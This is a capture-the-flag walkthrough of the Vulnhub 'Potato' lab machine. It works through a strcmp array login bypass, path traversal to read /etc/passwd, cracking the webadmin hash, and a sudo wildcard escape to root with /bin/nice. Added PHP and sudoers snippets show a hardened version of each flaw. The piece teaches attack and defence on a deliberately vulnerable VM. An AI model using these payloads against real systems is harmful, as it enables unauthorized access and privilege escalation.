[VULNHUB] Potato

Today we are going to hack the Vulnhub machine called Potato. You can download it from the following link: Potato

Enumeration


We start with an nmap scan to see which ports are open.

~ > nmap -A -p- 192.168.1.136                                                                                                                           
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 11:09 CEST
Nmap scan report for 192.168.1.136
Host is up (0.00043s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Potato company
2112/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (Debian) [::ffff:192.168.1.136]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2112-TCP:V=7.70%I=7%D=9/10%Time=5F59ED59%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,90,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:192\.
SF:168\.1\.136\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20
SF:creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creat
SF:ive\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.77 seconds
We see it has HTTP, SSH and FTP on port 2112. We connect to the FTP server with anonymous/anonymous to see what is there.

~ > ftp 192.168.1.136 2112                                                    
Connected to 192.168.1.136.
220 ProFTPD Server (Debian) [::ffff:192.168.1.136]
Name (192.168.1.136:sml): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.1.59 !
230-
230-The local time is: Thu Sep 10 11:12:03 2020
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 ftp      ftp          4096 Aug  2 19:33 .
drwxr-xr-x   2 ftp      ftp          4096 Aug  2 19:33 ..
-rw-r--r--   1 ftp      ftp           901 Aug  2 19:33 index.php.bak
-rw-r--r--   1 ftp      ftp            54 Aug  2 18:17 welcome.msg
226 Transfer complete
ftp> 
We download the index.php.bak file (and welcome.msg while we are at it).

ftp> get index.php.bak
local: index.php.bak remote: index.php.bak
200 PORT command successful
150 Opening BINARY mode data connection for index.php.bak (901 bytes)
226 Transfer complete
901 bytes received in 0.00 secs (928.1464 kB/s)
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
200 PORT command successful
150 Opening BINARY mode data connection for welcome.msg (54 bytes)
226 Transfer complete
54 bytes received in 0.00 secs (1.1704 MB/s)
ftp> 
Let's take a look.

~ > cat index.php.bak 
---SNIP---
  if (strcmp($_POST['username'], "admin") == 0  && strcmp($_POST['password'], $pass) == 0) {
---SNIP---
We see that the PHP code uses the strcmp function, which is vulnerable[1]: it expects strings, and when it is handed an array instead it returns NULL, which the loose == 0 comparison accepts as a match. Knowing this, we run gobuster to see whether we can find any interesting directories on the site.
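Why that check can be bypassed, as an added example that is not code from the original post or from the machine: the comparison recovered from index.php.bak, beside a hardened version of it. Only the strcmp() line comes from the box; the $pass value, the function names and the sample inputs are constructed for this illustration.

```php
<?php
// Added example, not the machine's index.php (only two lines of it appear in
// the post): the login check as recovered, and a hardened rewrite.
// $pass is a constructed placeholder; the real value is not on the page.
$pass = 'placeholder-secret';

// Shape recovered from index.php.bak. strcmp() expects two strings; when
// $_POST['password'] is an array (sent as password[]=...), PHP 7 emits a
// warning and strcmp() returns NULL, and NULL == 0 is true under loose
// comparison, so the password branch passes without knowing $pass.
function login_vulnerable($username, $password, $pass) {
    return strcmp($username, "admin") == 0 && strcmp($password, $pass) == 0;
}

// Hardened: refuse non-string input before comparing, compare in constant
// time with hash_equals(), and never rely on loose == against a function
// that can return NULL.
function login_hardened($username, $password, $pass) {
    if (!is_string($username) || !is_string($password)) {
        return false;
    }
    return hash_equals('admin', $username) && hash_equals($pass, $password);
}

// Constructed stand-ins for $_POST: the legitimate login and the array form
// used in the write-up (password[]=%22%22 decodes to password[]="", i.e. an
// array holding the two-character string "").
$legit = ['username' => 'admin', 'password' => 'placeholder-secret'];
$array = ['username' => 'admin', 'password' => ['""']];

var_dump(login_vulnerable($legit['username'], $legit['password'], $pass));
var_dump(@login_vulnerable($array['username'], $array['password'], $pass));
var_dump(login_hardened($legit['username'], $legit['password'], $pass));
var_dump(login_hardened($array['username'], $array['password'], $pass));
```

Under PHP 7 (Ubuntu 20.04, which this box runs, ships 7.4) the second var_dump() is true although $pass was never supplied, which is exactly what the password[] request later in the post relies on; the hardened function rejects the same input. On PHP 8 strcmp() throws a TypeError for the array argument instead of returning NULL, so that particular bypass stops working there, but the is_string() guard plus hash_equals() is still the right way to write the check.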

~ > gobuster dir -u http://192.168.1.136/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.136/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/10 11:10:43 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/.htaccess (Status: 403)
/index.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/09/10 11:10:46 Finished
===============================================================
We find the /admin directory :) Visiting http://192.168.1.136/admin shows a page asking for a username and password. Since we have already seen the code and know the vulnerability, we start Burp, enter "admin" as the username and anything we like as the password... Once the request is captured, we change it to:

username=admin&password[]=%22%22
It worked :) Now we click on "dashboard". Inside Dashboard there are several "options", but if we look at "Log" we see that we can choose between 3 files. We pick any of them and capture the request with Burp. We modify the "file=" parameter so that it shows us /etc/passwd, leaving the request as follows:

POST /admin/dashboard.php?page=log HTTP/1.1
Host: 192.168.1.136
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.136/admin/dashboard.php?page=log
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
DNT: 1
Connection: close
Cookie: pass=serdesfsefhijosefjtfgyuhjiosefdfthgyjh
Upgrade-Insecure-Requests: 1

file=../../../../../etc/passwd
It returns:

Contenu du fichier ../../../../../etc/passwd :  
---SNIP---
webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin
---SNIP---
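The Log option reads whatever the file= parameter names, which is why ../../../../../etc/passwd comes back. As an added example, not the machine's dashboard.php (only the request and the response appear in the post), here is the shape of such a read beside a version that only serves the three intended files. The directory, the file names and the function names are placeholders chosen for the illustration.

```php
<?php
// Added example, not the machine's dashboard.php (the post shows only the
// request and response): the shape of a file read that the "file=" parameter
// can steer out of the log directory, and a hardened version.
// LOG_DIR and the three file names are placeholders; the real ones are not
// on the page.
const LOG_DIR = '/var/www/html/admin/logs';
const ALLOWED_LOGS = ['log_01.txt', 'log_02.txt', 'log_03.txt'];

// Vulnerable shape: the submitted name is appended to the directory unchanged,
// so file=../../../../../etc/passwd resolves to /etc/passwd.
function read_log_vulnerable($file) {
    return file_get_contents(LOG_DIR . '/' . $file);
}

// Hardened: the request may only select one of the known file names (strict
// in_array so "0" or an array cannot match), and the resolved path is still
// checked to lie inside LOG_DIR in case the list is edited carelessly later.
function read_log_hardened($file) {
    if (!is_string($file) || !in_array($file, ALLOWED_LOGS, true)) {
        error_log('dashboard: rejected log name ' . json_encode($file));
        return null;
    }
    $base = realpath(LOG_DIR);
    $path = realpath(LOG_DIR . '/' . $file);
    if ($base === false || $path === false || strpos($path, $base . '/') !== 0) {
        return null;
    }
    return file_get_contents($path);
}

// Constructed inputs: a legitimate choice and the traversal value from the
// captured request.
foreach (['log_01.txt', '../../../../../etc/passwd'] as $file) {
    $result = read_log_hardened($file);
    echo $file, ' => ', $result === null ? 'rejected' : 'served', PHP_EOL;
}
```

The allowlist is what actually closes the hole; the realpath() check is a second line of defence for the day someone adds a name with a slash in it to ALLOWED_LOGS. Run as-is, with the placeholder directory absent, both inputs are reported as rejected; once LOG_DIR exists and contains log_01.txt, the legitimate name is served and the traversal value is still refused, and the error_log() line gives the web server log something a defender can alert on.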
In the /etc/passwd output we see a user called webadmin together with his password hash (the $1$ prefix is md5crypt). We use john to crack it!

~/Descargas/john-1.9.0-jumbo-1/run > ./john --wordlist=/usr/share/wordlists/rockyou.txt ~/tocrack.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dragon           (webadmin)
1g 0:00:00:00 DONE (2020-09-10 12:31) 100.0g/s 19200p/s 19200c/s 19200C/s 123456..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed
We see that john recovers the password. We log in over SSH with the credentials obtained (webadmin/dragon).

Low Shell



~ > ssh webadmin@192.168.1.136
webadmin@192.168.1.136's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 10 Sep 2020 12:31:36 PM UTC

  System load:             0.08
  Usage of /:              12.6% of 31.37GB
  Memory usage:            36%
  Swap usage:              0%
  Processes:               114
  Users logged in:         0
  IPv4 address for enp0s3: 192.168.1.136
  IPv6 address for enp0s3: 2a01:c50e:21e3:0:a00:27ff:fe89:8d97

Last login: Sun Aug  2 19:56:20 2020 from 192.168.1.11
webadmin@serv:~$ 

user.txt



webadmin@serv:~$ ls -la
total 32
drwxr-xr-x 3 webadmin webadmin 4096 Aug  2 19:26 .
drwxr-xr-x 4 root     root     4096 Aug  2 18:18 ..
-rw------- 1 webadmin webadmin  357 Aug  2 19:10 .bash_history
-rw-r--r-- 1 webadmin webadmin  220 Aug  2 18:18 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug  2 18:18 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug  2 18:34 .cache
-rw-r--r-- 1 webadmin webadmin  807 Aug  2 18:18 .profile
-rw------- 1 webadmin root       69 Aug  2 19:26 user.txt
webadmin@serv:~$ cat user.txt
TGUgY29udHLDtGxlIGVzdCDDoCBwZXUgcHLDqHMgYXVzc2kgcsOpZWwgcXXigJl1bmUg

Privilege Escalation


Let's check whether we can do anything with sudo.

webadmin@serv:/home/florianges$ sudo -l
[sudo] password for webadmin: 
Sorry, try again.
[sudo] password for webadmin: 
Matching Defaults entries for webadmin on serv:
    env_reset, mail_badpass, 
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on serv:
    (ALL : ALL) /bin/nice /notes/*
We see that we can run /bin/nice as root with any argument matching /notes/*. sudo matches that pattern against the argument text, so a path that starts with /notes/ but climbs back out with .. also matches. We'll take advantage of that * :)

webadmin@serv:~$ echo "/bin/bash" > shell.sh
webadmin@serv:~$ chmod 777 shell.sh 
webadmin@serv:~$ sudo /bin/nice /notes/../home/webadmin/shell.sh
root@serv:/home/webadmin# id
uid=0(root) gid=0(root) groups=0(root)
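The reason this works is worth spelling out, and a corrected rule makes a useful comparison. This is an added fragment, not a copy of the machine's /etc/sudoers: the first rule is reconstructed from the sudo -l output above, the second is a replacement whose file names are placeholders, since the post does not list what /notes contains.

```text
# Rule as reported by "sudo -l" (weak). /notes/* is not the command here, it is
# the argument pattern for /bin/nice, and sudoers wildcards used in command
# arguments also match "/" (unlike wildcards in the command path itself), so
# /notes/../home/webadmin/shell.sh satisfies the rule and nice runs a script
# the user wrote, as root.
webadmin ALL=(ALL : ALL) /bin/nice /notes/*

# Corrected: name the exact arguments the user may pass. File names are
# placeholders. The named files must be owned by root and not writable by
# webadmin, otherwise the rule is still equivalent to a root shell.
webadmin ALL=(ALL : ALL) /bin/nice /notes/report.sh, /bin/nice /notes/cleanup.sh
```

The general lesson from sudoers(5) is that a wildcard in a command argument is not a path restriction at all; it is a string pattern, and anything the user can type that fits the pattern is accepted. Auditing sudoers for `*` in argument positions is a quick check that catches this class of rule.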

root.txt



root@serv:/home/webadmin# cd /root
root@serv:~# ls
root.txt  snap
root@serv:~# cat root.txt 
bGljb3JuZSB1bmlqYW1iaXN0ZSBxdWkgZnVpdCBhdSBib3V0IGTigJl1biBkb3VibGUgYXJjLWVuLWNp
ZWwuIA==

End


And with that we are root on the machine.

[1] https://www.doyler.net/security-not-included/bypassing-php-strcmp-abctf2016